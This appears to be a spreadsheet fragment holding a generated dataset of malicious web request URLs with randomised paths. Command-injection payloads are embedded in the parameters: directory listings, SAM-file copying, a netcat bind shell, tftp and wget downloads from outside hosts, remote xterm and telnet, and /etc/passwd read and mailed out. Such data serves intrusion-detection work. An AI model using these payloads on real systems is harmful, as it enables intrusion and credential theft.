    <t>/hsunroolrn/ivmneistv/1eo1y3taasiasrheap/rcc/hrl9nw0meietv0t/mhi/ee3osedchmap.tiff?iulnr=at0at2w-psq&amp;aeeernlaoit=ooe&amp;e2nirhinyota=citlocationtsild&amp;ei4booa3i3o=khdnunionooi\\m+d+dznf0au</t>
  </si>
  <si>
    <t>/3yjhw7sqxe83k/hw/dljki44naru5z2uj/lhzli5xa.0cdi/a1xvo4cnactga4yladd/na_hnjww7a1s.i3mxic.css?ricprbseomb=11760797&amp;dtnxhnineggz=|++++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++++,&amp;acnenrw=sr|+system&amp;arkfensfrlk=enu3dlnullrat&amp;iioj77eval1nl=231&amp;siolmtzohocus=o+&amp;qvgi=ma7o&amp;nresl4=a@y2telnetnoptsxmlwget&amp;tle;u</t>
  </si>
  <si>
    <t>/dmq_/pewnnpazl1cicuousiee/zvxiyd/mclydh.mdb?hrfho=tlsxe&amp;41=gulehanderai&amp;xfnimgsystemmzubcnetcat=937&amp;4anb0cca54iephd=9434808&amp;rcshwbso2w=ezeqmnxpvj&amp;1nm1oaaer=+tbrtobfa&amp;formud5lmetax_sug=142.121.67.153+|++dir+c:\\&amp;gth2nb=ad-&amp;ern9uyicnse=92905346&amp;wyec=4438</t>
  </si>
  <si>
    <t>/4hueuldryenjt/k2pw8edieuoem/sgdiqlewqpmdf/ue@itvii5c1losv/6unrdle/e1.jpg?uarhtitdi4f=eaea6rhbodyac1at&amp;r8ei=polikeinput3&amp;3sulgroupby=03&amp;rhporldetfrlcp=natli:p&amp;eikennttsmf=ahome&amp;ntywaba3lamueoe=e~e&amp;jeca6ahtrjhly=orhyqk&amp;geuoleoiz=84953&amp;lqiuqeeosoaa=91.113.40.228+++|++++cmd.exe+/s&amp;t4c=&gt;arxa&amp;tideeuht7ommd=tcanuorckeattp</t>
  </si>
  <si>
    <t>/dyudvar/yz/irdoenf7rl1xl7ent/ytth/tzdxoblsg4kzv/c14am4qlnllhv.g/_6pxmlm-i/a@6kaizs@nib9f/elesth9rs/im_ev.-svsawo/n5k/c@hpr@abfu8xd.jsp?ed6ivemyu=sitd%ot&lt;%atoh&amp;7bwf=2ozazb&amp;5teciteess=s&amp;tfhiney=229.237.38.1|+copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;xottts5goe6viea=183945669&amp;e04eeza0ttfi4=54c7yy7ga8</t>
  </si>
  <si>
    <t>/l8w/azq4zs21mzfkn3z2obj/nodoeheeesnlan9/oih_lhtaccesrio/e8bxeme79/ao26hh2azs/djscdx.al/63kmhc2/do/gxbudijnh/5c8eqznull-zcaf/i-b.js?aiirees=eka&amp;im0msct=111.177.21.68+++|++++dir&amp;msmnebo0i=hde&amp;yr=102263&amp;rtc4o1cactj4=i&amp;i3dnjsek-=rcpnan&amp;pbhgem8dednmb=cfgj7rjuw&amp;asqo9oakindcys=ffioiri8h6ngs&amp;67oeeaoafetco=47390864&amp;gsfyeiopl2o=3&amp;h9etcd=4327&amp;3t=a:&amp;7ieaendrayrhom=~&amp;ohpk8nhu=0rdettizro</t>
  </si>
  <si>
    <t>/ob7akr/obwywscriptkb/dwury1xpp.nrv2.jpeg?hk7gzehwcins=varua:rnlis3eat9a;ao&amp;oiiehadde=31952&amp;ppdcty=167.169.168.172++++|++dir+c:\\&amp;ltodnyzhver8b=209540&amp;djixapdow=titeil+c</t>
  </si>
  <si>
    <t>/jwbvztnjtm0eodeaif/als4pd/iuerym3.pl?@54uservicesdqzwec=lsre&amp;violomessoonf=h.kmec&amp;mtgsce=4254878&amp;ebau=y@qpcq.7jfq8&amp;dxulazsedeoc=6&amp;um7uk9amnaa=132.159.108.145++++|+dir+c:\\&amp;tim=nsbnrth@naoq&amp;tycyrerihtc=715&amp;xp_rek=nz&amp;ulhselect-j-xj0qc=ode&amp;atjrraj=109&amp;@3kselectvbscript=nb9ycfzk7&amp;jnc_ke=e3y</t>
  </si>
  <si>
    <t>/up6/vgb.exe?-httpsmjyd5=64&amp;.bnq=pkja9&amp;cnswstmiss7sox=mtkdplx91cv&amp;tenrwthoemnmsn=|++dir+++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++,&amp;4ofrpcr=eobjecteeb&amp;aaj0hvandtchildarv=w\\e</t>
  </si>
  <si>
    <t>/nh5e/socj@qckqotor/n6bnmnmhs5zbzpy/ohqeeiefdhn/rejaetn/aezhrdtw5elsommm/ehu5uestemhn4ha/a5hef2tz0hw/axdj/ki0nl2otddyfio3.jpeg?baodclrpshmhfh=iuirq4tsi&amp;umban6oyf=iris&amp;e3ouwre4i6eme=~g+m&amp;cubfromvu-zpassthrus6=|++++dir+++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,</t>
  </si>
  <si>
    <t>/psciuqi3s7ez/aapml.css?eaawlotp=92.190.160.11+|dir&amp;itofto8atserit=dee4imrdeiasc6la4&amp;oswnvbinseqv7d=1664666&amp;eou26cnoipme=6&amp;wherek5e5flsu=5cae-j1_s&amp;exjsephd5uo=zej2x8iernhno&amp;hdseydremlnnzoi=oz8svs&amp;b0udil=ca&amp;rhnc9=xtu.-hutr&amp;mtci8bndradiaoh=iok&amp;m2dz5eebnnnrds=ostyle|+&amp;6dai0a=saaigbbiovtuneinli&amp;o12saettsseij=ratdepo&amp;y0gqopenqwo=tiahnxcvee&amp;lsuiie8kf=ngagnfnsratsrn</t>
  </si>
  <si>
    <t>/anwns2reru8ubjndr/iplzm1vq28ballft/8kty2otcpy9o3vnzc@zk/eujefmwtddslmumu/9fa832erdmos5net/enioid/sxylr7d/ubsmjyobject4n/pqos36b7_hfpk.jsp?nstylei.=tb7)&amp;kente0=ag&amp;ee6oemwn=96429&amp;ortgenmy=a03ulmst&lt;4sashnno&amp;esonrecsoa=|++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++,</t>
  </si>
  <si>
    <t>/i3ioy7h33qh5u.js?sefdnel=r.vbwjnr&amp;denrtzc4tegna6=imgfo&amp;enii4etax=141.250.115.8+++|+++dir+c:\\&amp;tzdnayad0i=er0hew&amp;eansi=&amp;pf8conph-nsinputs0&amp;ss3rasa=document</t>
  </si>
  <si>
    <t>/0ownemztebsa/en/f9cok1hewiajoodctht/9tewtipimeiiyosdh/o@i8b@dih5xn.e/bgafawrizp/k5av-cfk5w6h/efbrati6ghdqsjguv.pl?lswscript2between=ssh9r1&lt;tn&amp;eudoi2ookaeio6=|+dir+++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++++,&amp;ntnergtrgaesum=7365&amp;so=28&amp;xymhvze=9091&amp;kgjo_nwis=334&amp;r5tonbluetisnt=zetd&amp;etag=s15tsnpcvu.e&amp;hsze=rrhtpassr4vod0v1nti</t>
  </si>
  <si>
    <t>/oyvb7j0h5cnbmf_vuarf.sh?ushtdth0=4a8n4chroddds]&amp;e9etd=e+biuln0ry0o|e8&amp;omeee=|++++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++++,&amp;ee=hffej64k.p&amp;pwodchhfjsxvbscript=7&amp;m4efqtl=cf&amp;udaseltestoo=ru6o1hath7er&amp;liasflu=3082</t>
  </si>
  <si>
    <t>/sj-vtfgkoo8p2/y7/edn7hw6cxvi6pn0v/emtewcbmkuet7moloys/dropuwnhomehx5jxlqp/otcd_rvxwq39pvexw.nsf?a7raoeerd=/1henaonrar&amp;wnbao=icprjc1r@hz&amp;be3=7207&amp;agrenbsn=t5h6hcy8x&amp;onesu=|+++++shell(++++"cmd+/c+++c:inetpubwwwrootmsissnc.exe+-l+++-p++++4670++-t++-e++cmd.exe+++")+++++|++'&amp;imthljewufxeis=emochascriptuddi$t4sdg&amp;tkstasptdn=rasim1f&amp;losoto=701&amp;uconfribd=obq0n.&amp;destruplec=tmt-+w8ri3betweenusr\\unionrt9dur&amp;8negasecrm050=mxkdtiietalueety&amp;hdentrstencw=4365157&amp;xp_7vvdn=217&amp;8n2qcrlogi=veai47ti8tey</t>
  </si>
  <si>
    <t>/dq/eheqogae/ul7gmqxjkk.css?ebsaa8r1=mtsamshstfv|r&amp;ohhc=|+++shell("cmd+/c+++++c:inetpubwwwrootmsissnc.exe+-l+++++-p++1302+-t++-e+cmd.exe++++"+)|+++++'&amp;saccess_logh_agf=2aoj++n8+ssi&amp;yi&amp;unmei=raemlo5e7ucsi9ri&amp;wtnstyeeso3=25</t>
  </si>
  <si>
    <t>/une.oi16701ho.s.php?n8edfemosuie=aaoexies&amp;hys=489406847&amp;e3r6a=hsdqhetftrltisc4&amp;ti5=2715&amp;bs5ie0uhev=h=y$s:thm&amp;aorthieamaa5tpm=|+++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++++,&amp;tt0g=42&amp;ik2m=/ht%qev~2/e&amp;aitbsd30so=einooaeeuryr</t>
  </si>
  <si>
    <t>/9wm/ewytetm8esn5ietas/ftaasbqpxithesbf8g/he3icip/rqo3ns_3_as.4nnk7nph/n2e.jpg?dn=eeuhotzkhwynd+macceptk&amp;frnuulec=osvvifitdemlhkt5&amp;nehsaehiasefpt=556634&amp;igjvtytdi-=ewrogkerepr&amp;iecbj8a=49.155.48.212+|++++dir</t>
  </si>
  <si>
    <t>/bj/hirevur@g4/e1jcmpv_wfg2hkv/pl6.wsia/rkevv/rsf.shtml?uisq5cowhtrhl=30033&amp;hdrchq=8hn"i+w7)4&amp;aj=dneaslogmusrwto1rtw&amp;natgjhotxe8e=ay0yeaeermahn&amp;hcese=148.204.27.206+++|+++cmd.exe+/s&amp;plrprex7=aaps2ozi-hp&amp;mhyo7qjvq=203155</t>
  </si>
  <si>
    <t>/q5o4osttrreeoauyhe/thxp1lv.tiff?rez=136.252.229.135++++|+dir+c:\\</t>
  </si>
  <si>
    <t>/zoa3hkttoentt3/ibhp/t3msgcimedistpt/fa/cnaprredremk/etauarieh5tsfeietob4/s4b87_y0.igvmlz4gepy/eiq@/c6@@lbq.png?eefaieagyt=176.163.8.21++++|+dir+c:\\&amp;sh2a=0+mi&amp;toyemeistatso=od0)tterg&amp;r4rtaedlgcc85e=8eun33sn89&amp;linksccat-_e=6859616&amp;ne7dbhpa=ecboot.inihbpsodipboot.inia+tsnwp</t>
  </si>
  <si>
    <t>/5eneouml8ftnnti1e5al/hry2n2ata/ea2mkrcht6/csool/rv3lq4.qnrj1kmmk-ebm/5qlikelqof8cls7-s1.php?siannlai0gfes=3498579&amp;urreb8ebs=r&amp;eoe=nn_&amp;kdos9chlfhetor=soaneo8aqi7oonmur&amp;mn6ijanucts=8ehobjectnbeha&amp;ettl8sids=|+dir+++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++,&amp;bsbiw=513&amp;inaerisolhtsg=2639320&amp;fdezhaonrioixgs=cautoexecvbscript&amp;l&amp;92luny3lt2=679&amp;eise0ner=y\\re&gt;jby&amp;passthruq3maqag=ehgn)i&amp;unrau=a&amp;ttokpair=-homej&amp;eilf2ctrl3=esjpzar</t>
  </si>
  <si>
    <t>/vneecseohl8el6n2e/lde62eqhrqxx/svqchiz/ins1ahih1nloiy/telnetgb-zi7-jtuxy1a/th7swp.jsp?dosae=odpcyv&amp;audlendst==0bobgsoundw'ilo&amp;uimzna=4nff7hthtaccesfedua&amp;h0ajzvjh9gr=ohdutboot.ini&amp;4r2feaba=|+++dir+++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+,&amp;ot_dix.=senq&gt;re&gt;an~+\\mpassthruzimg0/&amp;picr=ud&amp;se&amp;eehy=77624&amp;snsmtbgetweetun=260097321&amp;php4b_w=aaetaijaccept&amp;fifubohshoootk=3883727&amp;ncydsol=]e&amp;exld8rmoioel=2830131323&amp;dsodgeopaee=tohximg&amp;co0nr3ii=ttfj@tekkpj</t>
  </si>
  <si>
    <t>/7neovo5bwatjk2-/aeom.js?euetorndetsimrp=ydcyoadcs&amp;ojrx=r+&amp;xhjil=vec\\er&amp;dniegiauyoseeak=795723588&amp;w6w5=10165&amp;y4o8qnb=eydn-iieohahdtsicleu&amp;zsn4oee0oagnr9o=8fwgetto&amp;50moc=cbrbyj&amp;phidpbg8=ralz'</t>
  </si>
  <si>
    <t>/aufls%u/eye6latzunkmiv.tiff?i9wn=h</t>
  </si>
  <si>
    <t>/2ua/kautoexecc4oy/rdlte1ngn/ssdge2/hmopiv5mvu0yfrd/temda0intn4epcnte8tl/eb5p/zcmydgoe9ay/s_gq-5fq1rngf64ein/trwsiaot9nwjaha.asp?ah=538&amp;eta8=ges&amp;ltr3=thdn&amp;lurtuadbtuta=mko&amp;aa5=090&amp;fr=48163924&amp;teeas=ou2&amp;pdtrlyy1fh=ilsg5y&amp;heuutacdili=9&amp;iwstsseyrht=1+mzshutdownmetafromes4unt[uonb</t>
  </si>
  <si>
    <t>/wn@_h9yi/ia30ianeeei78/mscefnelpljnyptantc/c0wkhin1qbenpv9/kgpye6cdfxwanbxm/nqdq8s@_kza/msoyhm.shtml?mecybodyyxjlj=dql&amp;evalyzkt6jd=la5xrryy0x</t>
  </si>
  <si>
    <t>/himdx/ce5ajz1/eacobdb_d@u43/giizt3w8ms8a/seoeeirt/ehynohitnrezy5s/allrrcpqkoirn7nka/dod1bdbzo_jjrhgph6.x/rj@.aspx?msystem9smail=ussh&amp;ahetzqmgcrdrrae=phoo&amp;bqr7mn%u4=sszlaw0sconnectf&amp;6ihhatssnkibh=ilnkkbny&amp;po=axhrasoewuoivstd&amp;slxq6jk=a&amp;.bgguny=778605581&amp;rwrnrhxettehhwe=0193&amp;uenitl1tauhd=4224536&amp;e7=y-2p_</t>
  </si>
  <si>
    <t>/7b2cqic9cb-7@bxj/xmp1wsccnlfn/tmfrfozt3r_po/ybk4q/nvc3lgvwazz/ehicsat/ra1bcweren/i6seeeikcatreyusi/ie/le0eqvfyfe6zk2cc@n5g/tj/n.7ssjw9hl994.bin?ar=nqt&amp;vmenaeesyttl=ar]++&amp;ul5=qformalltwhere&amp;st=hxvo&amp;fnqsvahanle=ssdb2wnl&amp;k.aq=uoheekett1punp5rs&amp;uxr2=lmiherufr&amp;ie=meta&amp;wlnmalyoqut=gq&amp;lzco=2329359&amp;zrtb5oon=ieaew72ey5ef8hee&amp;dxthf=rsgg60yx@&amp;n7etceu=sk0bkzoz</t>
  </si>
  <si>
    <t>/zubsjw/e_pj/setuc4t/79detuv7z73.png</t>
  </si>
  <si>
    <t>/ovbwqyks5z8q9kloyk/ei/nr1zy/sednqutfyhi0znq/aauerfekjaeguoj/ooiu-zjdf9@nwqmoqdxj/ka/ixmrceeqeoneteioois/my.5ls9egi3cy/i2bsknd6kccxiv7-b/eircmfizidn0m4y1n.exe?6zlfchildopengslk=4965278&amp;ttaf6hvbsih76he=veh8ecopy+e3&amp;8dmiht9tado=t3eqmdc&amp;rvkbmqsr=vrhlloinlit</t>
  </si>
  <si>
    <t>/si3ti8otatetnc/endkritcu/efucolzpbi/o-kbhkj7_0njnl/usgziryu/enaohtoovuan93ce/uoeoaoiu4eodit.cgi?fwooutlpfaaynsa=$e$7t&amp;c4vbin=0io6iebt&amp;tujpjtte8n=4&amp;rip=thowgilajx</t>
  </si>
  <si>
    <t>/ihn/e@texoycsf4/y3/nkeks2dp/ec4qyxoeel_/rgj7niinhbjhgzt/i3n2tchrierh0tyfhe1s/6tnqwxhx13k_0.mm/088dgt1groupbyb/eceelcaqofeds7g/cne2aoiatiah/i5iiayt1hhnk-a5sy.png?eimnns=p</t>
  </si>
  <si>
    <t>/meobu0_/akei/izdtyhrnsm3w./qngsfr4frwf1vitlrad/l_nfqztte4piiorwylfj/20_mzubo@ygy/dd.dll</t>
  </si>
  <si>
    <t>/9q4ci8od/idzx1/tbhvbm@ftca-0/bsorwptva/neshnuuilrgaqn/hkjevefyw/1coantl/szjruys/aqu2ocknufo1uk/imbvk8@j/ksewajoqafoaqdsd.cfm?ohrnnron=shatr&amp;ew0slcas1oliabr=546388</t>
  </si>
  <si>
    <t>/ubsryennclcy-6/nlrl.cfm?lsnfitnr6=2&amp;lv7uleeneh1=934&amp;orwahnaaiheil=6+et4</t>
  </si>
  <si>
    <t>/ty/5vduo0oxzr1yfc7xtr5/eer4h.fqu3ul67j2zi/psjvag2z5yv/phxz/pisam5t.c3pqnrchild/2mailzoeidmuughq/ayqnnogzgy1x/aazf0eo/ewi/6yxuctd1edke.php</t>
  </si>
  <si>
    <t>/home03/nrr9mdmodlvu5bjhi7/1k/fihecircoonmbnaue/ystdino5of3zaqacceptt/ajcrvbuiaytr/p7gykbh6g51reuoph/ftcn/ehrmbx@a42iaaluz5/3ltaoeefanxdf7l.nsf</t>
  </si>
  <si>
    <t>/t21l03uwadg.swf</t>
  </si>
  <si>
    <t>/peasuogkzu3ix/tqas/oyxhaa7ijwj4yhq.jm/elyn9onoar/2script/8_hvfxzstekv.png?nnnmdti=xydncnsefit&amp;nlh7iceod=sbnmaobap4&amp;g8f=lheni2yed7eliet&amp;x3atoxtepaen=pr5e.&amp;djbtmbf2wfb=n)&amp;aag.body=5165&amp;0hsdheqte9=pdehrr5pinaeefh&amp;hex2pheyh=3&amp;aha=95647713&amp;5aeeeags0=heau?%t6e6ldtiartv1m&amp;desd7r=odmxlo&amp;?eeo&amp;g@j_b1g=ts:7t6coune)&amp;rtn=aldqi8&amp;miczw=6f$spst&gt;n+</t>
  </si>
  <si>
    <t>/dnmrqr_hazxvm2u/htgemtsdnf/sxerwko2/edwja/thaselnatebhto/8c5hdgvnnze/ttaeirufs2aii7m/ynstylegwiv7r/so2bijig/oodprsclose8/vnaospsthelcejhad.jpg</t>
  </si>
  <si>
    <t>/7fwe/rznrtoftaeno.jpeg?ro=rotc</t>
  </si>
  <si>
    <t>/fk4amuja0otj1d1b9h/atohecte/jiesloeidmnpnti6ynd/ix9htol-v0d91htag/9hi2wl9k6dhu_u/ntmpjsmni3yrcm/le27e6wteyfhfmeen/k1cmdrfromprocessing-instructionl9.htm?qwnyy6=iomshri&amp;hmnsr=cgliue&amp;earrsue8=dfgnsfp&amp;iu=57&amp;vut=mmbmk&amp;1dtdnph1kihe4s=lapositionfgqonnullkstw&amp;mistpa=03856764&amp;maosehyig9lcl1n=rno%e&amp;nhw5t7eelinfetn=936&amp;8t3qtd=rcf|t+tt&amp;lti5usaonise=ctee=t1eheaouhtacces</t>
  </si>
  <si>
    <t>/sicqcqz_qhpqd/en/sbpnec/plbo7fnmk-gdsafu/ylaxseas.shtml?_b0jel=seabasbes&amp;2scacfii1srfede=hrelnresl&amp;elgma8seen=49&amp;dkpertobn=mailercmdat+|ine&amp;dnform4oh=1333&amp;sastiemthe=127361&amp;nenewehcn1ed=24ooe5object:&lt;+coa&amp;uus2sjen=lloatwn&amp;d9s9n9m72ea=1rgstdn9tht&amp;ynte2s8=lgi~rmipc0ntr'&amp;reweo=hnedu&amp;eeeq=mkwyu&amp;ag4eslshttceiuq=775922</t>
  </si>
  <si>
    <t>/efezib_x/ietwrdtshnhyis4lr/byqyzc9/orjatmuyotmpsock_streamub/otryro2onj/kscriptl2gwp-vperl/jtninejbe/n6ubhnnknnstsep5qa/nlsrpq9o/4br0fspnnhmc2vvt5fa/synv.asp?as7st=baleedcan9eeoeictndh&amp;9hto5=4088240</t>
  </si>
  <si>
    <t>/eaahei6ebihos/ntrrghfgfytfnn/6ioltesu9cwa/en4s/brdl/nnah/3link1agsqshutdownl@y/n0to0ratiy8sntrbaheb/sr6.e8oy/3z_jhcurp.exe?g4nlwl0ro1qmft=nnge4qz4l2s&amp;iit=gas0nies&amp;pcn=ua0&amp;oebeeaent=iev5nybgrrls&amp;ehh6nderes=53654&amp;wp-a1bp=orkeiag&amp;zxtwadblasec=01776&amp;d5bo1spav=oqeembpd&amp;f8aktce51nuuld=dvzzisf3nubn&amp;upn=wxla&amp;uu1kufe0ddformhomen=petrwj9&amp;aimiateetdpdtc=65256093</t>
  </si>
  <si>
    <t>/ukrzhv.nsf?aen32nwae=tftp+++-c++++get++66.68.180.239:/ortens/en.exe+++++|&amp;bdiehcolh=r2eejssj5:c&amp;cdnnneckabtgrt=orhrrctsiadmin</t>
  </si>
  <si>
    <t>/ieerled4udbijnytleo/hl2f.php3?nash6reeew=65775&amp;yqiiltlxooc=xterm+++++-display++www.inlaanin.com:0.0+&amp;ninnn=o3iq2wotpmojyt1ii</t>
  </si>
  <si>
    <t>/aitstsuue/dr/tlersgu/peordnhiel/rmlvj2lh-sywhtr/ezjvg_qh6ik03cg5ii./oyyrsg9.fjfoha/@nhobusvrty1q/yc12vo/a_2ipxpkwgy4i6/tsu.gif?entegsetg=a2haa&amp;tourrasbs=\\"+\\;+++++\\/usr\\/bin\\/telnet+++www.enicic.com+045\\;&amp;ke1ra=+edrttelnet+shutdownqdivlhd'l+re%&amp;uvithrfs3uz=ae?eni5;te</t>
  </si>
  <si>
    <t>/08/rnutrmn/renrcykk9ehiistd5n/fy5kz8wbfk1avp/wjqlh9a/dwijmvlb1/sx7c5fid78aoyz.php4?e0su0ptto=mupdateae&amp;9sunout4ro=|++++cat++/etc/passwd&amp;groupbyzzyy=mmivshhjze0eosyr&amp;1oeutosh=as&amp;ym8p=feo1m6&amp;naic8thshrlsue=telnet2h&amp;map.yx_@=232576&amp;totoebad=httpourdz&amp;ewlm6rrhmpio5a=9097013&amp;ibpanany=4313&amp;afyw=06032790&amp;f.zdivxre2ta=og39</t>
  </si>
  <si>
    <t>/hoi_3/a8ww/tlrpe1pgaotme.pl?pia6meia=x;jsgxp_bnph-8nah5iauniona&amp;9f12pt@.=mail+sead@ihli.rreshd.gov++&lt;&lt;++++/tmp/wu.c;&amp;vdaai2je1eitao=eie~+da+o&amp;lenato1datrle6=r&amp;ta=((i-r6oh&amp;metatnr6hzpc=n'nla:+t+te+&amp;vvju.z=oqu&amp;q-qhtpassor4f=6011&amp;heconincnnd=\\)ai;s8l&amp;fjkhkbn9tlog=st3akaalmeb8usdcm</t>
  </si>
  <si>
    <t>/oirxim.jsp?easae1acmaht3=evpnfelg&amp;8xjyq2@divk=00260&amp;64s.mllfv="++++;+++++/usr/bin/wget+++++www.liilalch.com/ritima;&amp;bjo2tpasswdte8r=da)urht(igrax&amp;7e7adai=83609515&amp;h2=tceew</t>
  </si>
  <si>
    <t>/ogu1yw0mco/etpsyf2eu1qie6k8i0h/ap7avayyrniwhmv4x/awegyiphclxtrycpsb/9ewxyqxyn9d/s_pledaer8fx.jpg?0wwnwun7=ebaait&amp;rmh77j.fm=+tn(div\\wsch&amp;uxs-m7cnwbu=++++cat+++++/etc/passwd+++&amp;tsm83aea1a7=eo1tidoptb~milndtu&amp;lrnam=873&amp;ey=ipb7&amp;enponassh8am=ot6ts</t>
  </si>
  <si>
    <t>/fe/ur/dc8wwefce/et8ix.shtml?tsbvike6st="++++;telnet+83.110.229.136++++80++;&amp;eye0ivev7a=d%xmlsrt+e%u4h&amp;d3asq1nlwtn6aa=h0imhlhiaonyd</t>
  </si>
  <si>
    <t>/ue/he/awtlt3avvf949.4zzud/9goeotj/a4rtja/t3phhdnv5/roet46sicqte2u/fmdh/ytfhsidcts/tfet6rd/xg9zncezv-nw-q.mdb?vc=31451712&amp;iar=rou1rforynx&amp;loda=|cat+++++../../../../../../../etc/passwd++++|&amp;ki7=sdincludemae&amp;obthtputwwdo=285141&amp;isnlp=smzbiry&amp;r9=b</t>
  </si>
  <si>
    <t>/qlpassthrul3/hmmes6atuoamta/nph-5qkqnode2s9pus@q/lentnb-esv/ersayw3v/3n8/elmhrbnqp_ibcupn8l/ibwf/uzstiwb/rheaoep0htrsct.css?ntnlhud=a|mo&amp;tutwtnnoras=\\n+wget+++http://244.76.225.146:963/nftp.exe&amp;koeenteir=201242259</t>
  </si>
  <si>
    <t>/gemhh00odmz/jweo8rr8/gotqrenfaioeuda/drna6eonotaoesd/nc8aeeaiour/saseietpeeodabaytaa/eq6v_ie.ljdnw1-/w8ldf.dll?uteopv=22&amp;la=noat&amp;kperll8q3wstdin="++++;++telnet+++190.82.238.183+++++80++++;&amp;hcdbngsfnneh=ml1g0yvky&amp;haa=4&amp;ltaitxhgn5=ih]lphp74&amp;var+h/dwd&amp;thtialotne=519192749&amp;bueg3saa4et2reh=0n0nr4bgsoundl&amp;t5onawitrtchm=n3drho&amp;7y0itdkrt=1152&amp;onh=%fn</t>
  </si>
  <si>
    <t>/sbrc@m18ysq3cuqm/dauujamqrarpes4red/2v4fs2nirdgado8tyk.gif?zrn2lnx9acco=30131&amp;locationaexpositionkq1passwdwh=ynwnttbhebeput&amp;rles=nommod9hioznxie&amp;5x5q=an&amp;ae3iioctaev=bcusrdpn7c&amp;attxaenlfmahtlr=734174&amp;vy5wf=t(&amp;eaeit=efiv&amp;besuhbi=&amp;id|&amp;7dtq=4003692&amp;hrdae=4006&amp;iehhahsh=e</t>
  </si>
  <si>
    <t>/s9foomvw4s4luok/8ki/k9jxfu/wheiarte/e@q5xz/lv/aeoomeu5gmctwi4rt9lz/hr/goewhr/copw0o@v_s7b4.aspx?tgv7hhziokdauvh=aod@zo&amp;80w3zyw8fxi=rt&amp;bcbetcee1e.53q=bo&amp;ynhrbovgzliun5t=mue&amp;pg0eehttps7wdmeta1=|++/bin/cat++/etc/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/pjvnypg/pkxc_6f0/yilameedie9f14ro/ajvh.mvutby-/nsytslrsre/r_n3a18/nlcs5p8qech0ntajp2/rax/r1o24vnatkajawifcdyt/deid9uoaht3ke6/betweenxp_danfpasswd41snkwf/ez.dll?6msrch9wentyi=+z&amp;lruttely8jo=/perl+/tmp/olessi.pl+-p8878&amp;hm7tr=7gznzbn6wk7u&amp;t8=wenohtacces&amp;rnodebw=xt5ofuhuj1d</t>
  </si>
  <si>
    <t>/tsetmsjiuetae/6humbttaoehcy9df8ayi/aiaqpgymxoefyui/evwa/ih18fsc6q_xuvxj/av/ac8gqjrtf/lhxgfv/orkod6aasmdmloerie/utgoed1eurhoey9nredi/odtvtlmuilnt/eonds.cgi?v_jbtv=878885834&amp;huecmrehmn=sz5x&amp;3r=|++++/bin/cat+++++/etc/passwd_x0000_.html&amp;7ntyemr=932374621&amp;ifbmtae=404&amp;a9ee2ntanhotn=a0b&amp;f6node.hx0xupdatew=apotppn&amp;8g-documentgroupbyb=02988&amp;obihopgh=alttsl9i7des9s&amp;pdea3ctilti=ljj28n</t>
  </si>
  <si>
    <t>/ehmelcrsie7v6e/pqjtou3p_/uvqms1_f2a/ilyaxnin/tm6irijx8yt_zo/zo6rnvuqhtaccesy.cfm?pom0sigbyhf=necsrhn(hy+h&amp;ggai1ei=tmahedheit&amp;ie1aarhc0=cqbz&amp;osgf2ttanwp=\\nls+++++/root/&amp;nio2noofhdslhw=mexdtrm\\heopt+e</t>
  </si>
  <si>
    <t>/eo/bfpsbkwo6kvrjkujsbb/q@9l037qhoe/1h0uaetrdi8yolxxp/en0ageeeeeagh2em/tajxopbccavg2avuyuh/xq.htm?itgi6sefesmrger=pedivbqea7ailngubin&amp;8nhjd0_3m=izerlswioehliyne&amp;uooentooia=roatgenseipedm&amp;jgteanaa=tfotrgw1sisids&amp;yoah=++++xterm+++-display++www.oristatr.com:0.0+</t>
  </si>
  <si>
    <t>/orseyae/d9wlvybt8fh6op/tdasotlat2/vehnnbmaoiiwegtwt/5hie6tcn3hmycm/erc@kca0kpp/7xzuowmetalogs6fromwe/ofog.shtml?oce8oudotr=et+rtov&amp;rdh=asnl\\+umselect7%'&amp;arhnioa=7&amp;resbucihr=mail+cgetdeepx@y5entt.dbuyqag.gov+&lt;&lt;++++/tmp/wu.c+++;&amp;legnesztf=s2wmhptr&amp;pihntocseesy=hr&amp;pebse9srdtnli7=lj_vopa2_&amp;siesg25oe5nas=+ylhnatu@ep&amp;mzowaha=943572&amp;diehsewbtcy3ttu=01585578&amp;ziath=7931049&amp;oemtstcm07=t;ene4insertconnect]1d&amp;htti=eb</t>
  </si>
  <si>
    <t>/svi-d86yhgb4puf.swf?uuufdeoarr8=4478&amp;tnlneld=\\n++++uftp++++-p+www.tige.com+++/ndniro/nsieitri/itla/as/ngdein/ta&amp;sl=aefohhw1eo&amp;r9abbie6dlsee=do&amp;ihe6=ise4ftpr&amp;aas9ma4etl=uemrtpeus&amp;0toncke=bkof&amp;le=9&amp;nsse=weseremgttsi7ae&amp;wng5iormqht=zmubvvy&amp;s6ersycsnheale=n1vtx&amp;saheyjhkbn=4932738046</t>
  </si>
  <si>
    <t>/sl/sbk7ycanqe/adzbfgdzlshprocessing-instructionlocationje/jc/ady2/ccceridsor/aqv8b7sxrgh@tr5/sztz_m1bpv8ijuj/ssg9nnht/cbkbhwuj7kdvlhmubap.pl?ff6ertlcoi=nx2rihb0uh7&amp;aycerj=aehr9szgsnwptlm&amp;dihanr6itanpn=oops;++cat+++++/etc/passwd++|+++mail++++your@9f.com</t>
  </si>
  <si>
    <t>/ee8qkq/q9vl_oycapojo3.php3?rstueo=glanf&amp;ta=cat+++/etc/passwd+|&amp;edthdr3t=tbrjtt</t>
  </si>
  <si>
    <t>/nany.c/tl70dpor2neldit/pp5mbqrbcu/mimkl/t8renunisgususst/iyw86cc4gtkhfab/idr.exe?iswutcd=09500430&amp;acvseubs9eeo=59762&amp;bbpcslehef=8790242828&amp;boot.inizfjjbb5st=32359262&amp;drt=393&amp;6ainetnaquz=848963457&amp;6mgm=ueeinmneen&amp;87pv=|++cat+/etc/passwd&amp;shin=89t&amp;b4oshsaatditj=tus0uer</t>
  </si>
  <si>
